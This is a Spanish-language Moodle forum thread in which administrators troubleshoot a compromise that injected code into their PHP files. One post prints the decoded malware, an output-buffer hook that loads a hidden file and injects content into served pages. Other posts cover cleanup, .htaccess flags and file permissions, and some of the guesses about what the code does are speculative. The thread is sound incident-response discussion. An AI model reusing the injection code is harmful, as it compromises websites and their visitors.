Problema al eliminar, mover o modificar RECURSOS

Problema al eliminar, mover o modificar RECURSOS

de Webmaster iacat.com -
Número de respuestas: 19

Sin tocar nada en Moodle, de repente, cuando quiero eliminar un recurso o moverlo o actualizarlo se queda la pantalla en blanco.

En la barra de direcciones pone por ejemplo:

.../moodle/course/mod.php?delete=1395&sesskey=291ge...&sr=3

Le ha pasado a alguien. Se habrá roto algo en la base datos??

Un saludo y gracias.

Promedio de valoraciones: -
En respuesta a Webmaster iacat.com

Re: Problema al eliminar, mover o modificar RECURSOS

de Webmaster iacat.com -

Estimados amigos. risa

YA LO HE ARREGLADO. He puesto una copia que había hecho con antelación He RESTAURADO la carpeta Moodle.

Y os pongo lo que me ponía en todos los archivos con php que tenía en la carpeta moodle. A ver si alguién le ha pasado lo mismo o me puede explicar que es ese código que me aparece.

Un saludo.

En respuesta a Webmaster iacat.com

Re: Problema al eliminar, mover o modificar RECURSOS

de Webmaster iacat.com -

Estimados amigos, he decodificado ese código y me sale esto:

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('C:/wamp/www/moodle/lang/en_utf8/help/enrol/authorize/images/mdl_utf.php')){include_once('C:/wamp/www/moodle/lang/en_utf8/help/enrol/authorize/images/mdl_utf.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}

Alguién sabría explicarlo???

SALUDOS.

En respuesta a Webmaster iacat.com

Re: Problema al eliminar, mover o modificar RECURSOS

de Webmaster iacat.com -

Es un ataque, es código de tarjetas de crédito falsas. Hay un montón de codigo falso.

Si alguien le pasa lo mismo que me lo diga.

En respuesta a Webmaster iacat.com

Re: Problema al eliminar, mover o modificar RECURSOS

de Juan Luis Garcia -
Me ha ocurrido lo mismo en mi sitio moodle, me ha aparecido ese código cifrado. Lo mejor es borrarlo, verdad?

Un saludo y gracias por comentar todo por que estaba perdido!
En respuesta a Juan Luis Garcia

Re: Problema al eliminar, mover o modificar RECURSOS

de Webmaster iacat.com -

Si, es un ataque al moodle. Creo que lo que hace es modificar las opciones de pago a través del moodle.

Vete a la carpeta: C:/wamp/www/moodle/lang/en_utf8/help/enrol/authorize/images/

y borra todo, menos 2 imágenes (alba.php cvv.png que son del propio moodle) y  , porque ahí es donde guardan el código.

Según he leído por ahí ha sido un ataque a la seguridad del MOODLE.

Yo he puesto un firewall nuevo y he añadido la carpeta .htaccess para restringir la inyeción de código en la carpeta raíz de la web del moodle.

.htaccess

php_flag register_globals off
php_flag allow_url_fopen off
php_flag magic_quotes_gpc on

A ver si hay alguién que sepa más y nos pueda ayudar a prevenir estos ataques.

Por cierto mira en la lista de usuarios de tu moodle, a ver si te aparecen estos 2 elementos:

Faye O Horner/font>

keefrence keefrence

Que sospecho de ellos.

Un saludo.

En respuesta a Webmaster iacat.com

Re: Problema al eliminar, mover o modificar RECURSOS

de Webmaster iacat.com -

Quiero añadir, que no sólo se me infectó el Moodle, también SPIP, ESCOMMERCE, y otras webs basadas en php. Tuve que restaurar todo.

En respuesta a Webmaster iacat.com

Re: Problema al eliminar, mover o modificar RECURSOS

de Juan Luis Garcia -
Hola

Los alumnos que me comentas no están en mi lista de usuarios.

Además en la carpeta no me aparecen más que las dos imagenes que deben estar, así que tendré que restaurar todo, si alguien sabe algo más que por favor nos de alguna pista =)

Un saludo.
En respuesta a Webmaster iacat.com

Me pasa lo mismo, no me deja editar ningun recurso

de helmunt sierra -
¿Como solucionaste ese problemita?, para algunos recursos que tengo en mi moodle quiero eliminar recursos y me aparece la pantalla en blanco.

He identificado lo siguiente; cuando quiero eliminar un recurso, esta peticion tiene una url que relaciona el numero del recurso y la accion. Es decir, para el caso de la siguiente URL que corresponde a eliminar un recurso, el numero es 2458 y el numero 1 donde termina la ruta es el que no me permite eliminarlo.

Para darme cuenta de esto, lo que hize fue tomar el link de eliminar este recurso y cambiarle el numero uno a la siguiente direccion por el numero 0. Cuando hago este cambio me lleva directamente al mensaje que me pregunta si estoy seguro de eliminar este recurso.......

http://www.mimoodle.com/course/mod.php?delete=2458&sesskey=WWNaB9M83v&sr=1

¿Alguien podria echarnos una manito.....?

Un saludo,


En respuesta a helmunt sierra

Re: Me pasa lo mismo, no me deja editar ningun recurso

de Elena Iglesias Sastre -
Hola,
A mi me pasó lo mismo, y después de intentar limpiar los archivos pensando que era un ataque, otra persona del foro (Mateo Porras) me dio la solución... Cambiar el idioma al entrar a tu portal Moodle y escoger Inglés. Es menos cómodo pero podrás editar y borrar recursos. Es extraño, me gustaría saber por qué ocurre esto.
Saludos
En respuesta a Elena Iglesias Sastre

Re: Me pasa lo mismo, no me deja editar ningun recurso

de Priscilla de Carvalho Nunes -
Hola Chicos. Me siento mal para el español, pero tuve que usar el "Google" para la traducción. Estoy pasando el mismo problema, no tiene una solución, pero podría hacer un truco para borrar y editar: cuando aparece una página en blanco al final de la retirada de abordar el "sr = x" después de "&" y funciona normalmente. Espero que alguien pueda una solución definitiva a este.
En respuesta a Priscilla de Carvalho Nunes

En que versiones esta pasando esto?????

de helmunt sierra -
Hola de nuevo,


Quiero preguntarles a todos los usuarios que les ha ocurrido esto, que version de moodle tienen. Para lograr identificar que versiones son vulnerables.

Por mi parte, yo tengo la V 1.6.5
y el moodledata lo tengo alojado en www.misitio.com/moodledata.

Tendra algo que ver?????????

gracias, un saludo
En respuesta a Priscilla de Carvalho Nunes

Re: Me pasa lo mismo, no me deja editar ningun recurso

de Boris Gomez -

Gracias, Prix Dekanun!! Su truco para editar y borrar recursos funciona!

A continuación edito sus palabras, para que se entienda mejor:

Un truco para borrar y editar los recursos con este problema es el siguiente: cuando le aparece la pantalla en blanco, elimine los últimos caracteres, a partir de los caracteres '&sr', por ejemplo, '&sr=1'

En respuesta a Elena Iglesias Sastre

No me funciono....

de helmunt sierra -


Cambie el idioma para poder editar los recrusos que agrego y me sirve pero para los recursos que creo apartir de ese momento pero para los que tengo de antes no me funciona.

Espero que alguien nos ayude por que, efectivamente todos los archivos de moodle los ha infectado... todos los php.

Ahhh, por cierto, algunos usuarios ya me han estado comentando que tambien les aparece la ventana blanca cuando hacen clic sobre activar edicion......


A todos un saludo..........
En respuesta a helmunt sierra

Re: No me funciono....

de Pedro Gutiérrez D. -

Hola a todos, me acaba de suceder lo mismo en Moodle 1.8.2.. ya borré los códigos de más de 100 phps..

Mis preguntas son:

- Con un upgrade se arreglará el asunto?? Por ejemplo instalar la 1.9.4?? y que se reemplacen los de la versión anterior??

- ¿Qué hacer en caso de éste ataque? solo con poner el

.htaccess

php_flag register_globals off
php_flag allow_url_fopen off
php_flag magic_quotes_gpc on

Asegurarémos un poco más nuestro moodle de inyección de código malicioso.

Saludos y muchas gracias.

En respuesta a Pedro Gutiérrez D.

Re: No me funciono....

de David Hernández -
Hola Pedro,

Con un upgrade se arreglará el asunto?? Por ejemplo instalar la 1.9.4?? y que se
reemplacen los de la versión anterior??


Yo pienso que este es el camino óptimo a seguir.

No obstante, si se dañó la base de datos, creo que puede no haber solución.

Si tu plataforma "medio la libró", entonces, me parece que la actualización
tendrá buenos resultados.

Pero antes de hacerla, lleva a cabo el proceso con un respaldo de tu plataforma,
en un equipo configurado para tal fin.


¿Qué hacer en caso de éste ataque?

Entiendo tu pregunta como solicitando medidas preventivas.

Si es así, pues por lo pronto, creo que valdría la pena actualizar constantemente la plataforma,
independientemente de si es o no atacada.

Estar al tanto de lo publicado en este foro.

Seguir las mejores prácticas de seguridad propuestas en la documentación de Moodle.

Y también estar al tanto de noticias del equipo de desarrolladores de Moodle,
como esta última publicada por Martin Dougiamas.

Una última idea que acabo de recordar y que leí en los foros, es cambiar los
permisos del archivo "config.php", para que no tenga permisos de escritura,
más que por el propietario de la plataforma ("Grupo" debe ir sin permisos de
ningún tipo y "Otros", con permisos de lectura y ejecución)

Saludos

En respuesta a David Hernández

Re: No me funciono....

de Pedro Gutiérrez D. -

David nuevamente gracias por los comentarios..

Pero realizando la sugerencia de cambiar los permisos del config.php, al quitarle los permisos del grupo (705), moodle solo me muestra la pantalla en blanco, sin embargo al darle los permisos de grupo solo lectura (745) y la plataforma hasta donde la he revisado funciona perfecta.

Me despido para empezar a hacer el upgrade...

Muchas gracias y estamos en contacto..

En respuesta a Pedro Gutiérrez D.

Re: No me funciono....

de David Hernández -
Hola Pedro,

Gracias por la aclaración.

La pasó a anotar en mi manual personal de "mejores prácticas" wink

Saludos
En respuesta a David Hernández

Re: No me funciono....

de Wenceslao Fernández -
Hola David y resto del foro sonrisa

Yo tengo el config.php con permisos 640 y funciona perfectamente, por si os sirve de ayuda.

Me ha sucedido algo extraño con la instalación de unos amigos que han sido atacados. El caso es que tienen en el mismo hosting 2 Drupal y 2 Moodle y tan sólo uno de los Moodle ha sido atacado. He estado revisando las configuraciones y parece que es la misma en ambos Moodle en cuanto a permisos, forma de dar de alta a los usuarios... extraño.

De todas formas la cosa no es excesivamente grave, esta vez. Subir la última estable (en su caso una 1.8.8) renombrar moodle a moodle_old, descomprimir la nueva versión copiar config.php del moodle_old a la nueva versión (limpiando el código malicioso antes, claro está), pinchar en notificaciones con la cuenta de administrador y listo. Parece ser que no ataca a la base de datos, sólo al php.

Salu2

W
En respuesta a Wenceslao Fernández

Re: No me funciono....

de David Hernández -
Hola,

Aquí de ocioso sonrisa

Probé permisos 640 y no me funcionó, pero 644 sí.

Cabe recordar que los permisos 644 implican:

Propietario -> Leer, Escribir
Grupo -> Leer
Otros -> Leer

Los permisos 640 son:

Propietario -> Leer, Escribir
Grupo -> Leer
Otros -> (nada)

También parece que funcionan bien los permisos 604 (pero eso aún lo
tengo que probar):

Propietario -> Leer, Escribir
Grupo -> (nada)
Otros -> Leer


Salduos